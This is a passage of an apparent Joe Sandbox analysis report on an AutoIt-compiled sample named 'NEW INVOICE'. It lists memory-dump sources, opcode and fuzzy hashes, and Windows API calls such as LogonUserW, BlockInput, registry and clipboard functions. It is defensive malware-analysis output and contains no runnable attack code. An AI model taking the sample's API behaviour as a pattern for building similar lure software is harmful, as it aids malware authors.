                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlockInput
                                                                                    • String ID:
                                                                                    • API String ID: 3456056419-0
                                                                                    • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                    • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                    • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                    • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                    APIs
                                                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: LogonUser
                                                                                    • String ID:
                                                                                    • API String ID: 1244722697-0
                                                                                    • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                    • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                    • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                    • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameUser
                                                                                    • String ID:
                                                                                    • API String ID: 2645101109-0
                                                                                    • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                    • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                    • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                    • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                    • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                    • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                    • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                    • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                    • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                    • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                    • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                    • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                    • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                    • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                    • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                    • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                    • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                    • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                    • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                    • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                    • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(?), ref: 004593D7
                                                                                    • DeleteObject.GDI32(?), ref: 004593F1
                                                                                    • DestroyWindow.USER32(?), ref: 00459407
                                                                                    • GetDesktopWindow.USER32 ref: 0045942A
                                                                                    • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                    • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                    • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                    • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                    • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                    • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                    • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                    • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                    • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                    • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                    • _wcslen.LIBCMT ref: 00459800
                                                                                    • _wcscpy.LIBCMT ref: 0045981F
                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                    • GetDC.USER32(?), ref: 004598DE
                                                                                    • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                    • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                    • API String ID: 4040870279-2373415609
                                                                                    • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                    • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                    • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                    • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000012), ref: 00441E64
                                                                                    • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                                    • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                                    • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                                    • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                                    • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                                    • DeleteObject.GDI32(?), ref: 00441F1B
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                                    • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                      • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                      • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                      • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                      • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                      • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                      • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                      • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                      • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                      • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                      • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                      • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                      • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                      • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                    • String ID:
                                                                                    • API String ID: 69173610-0
                                                                                    • Opcode ID: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
                                                                                    • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                                    • Opcode Fuzzy Hash: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
                                                                                    • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                    • API String ID: 1038674560-3360698832
                                                                                    • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                    • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                    • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                    • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                    APIs
                                                                                    • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                    • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                    • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                    • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                    • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                    • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                    • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                    • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                    • GetWindowLongW.USER32 ref: 00433E8A
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                    • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                    • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                    • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                    • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                    • DeleteObject.GDI32(?), ref: 00433F70
                                                                                    • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                    • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                    • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                    • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1582027408-0
                                                                                    • Opcode ID: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                                    • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                    • Opcode Fuzzy Hash: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                                    • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AFC2
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,004848E8,00000000,?,00000000,?,?,?,?,?), ref: 0046B01C
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0046B069
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseConnectCreateRegistry
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 3217815495-966354055
                                                                                    • Opcode ID: 732a809445d423313388e5f08cb9df37ac73e1fa509303b801a12c02435c01dd
                                                                                    • Instruction ID: d9d2404220d166b11353d33fb52652cf6d28829cdaa3b272cf204d1a2c990fb8
                                                                                    • Opcode Fuzzy Hash: 732a809445d423313388e5f08cb9df37ac73e1fa509303b801a12c02435c01dd
                                                                                    • Instruction Fuzzy Hash: 2CE1A1B1600300ABD710EF65C885F1BB7E8AF48704F14895EB945DB392D778E945CBAA
                                                                                    APIs
                                                                                    • OpenClipboard.USER32(?), ref: 0046C635
                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
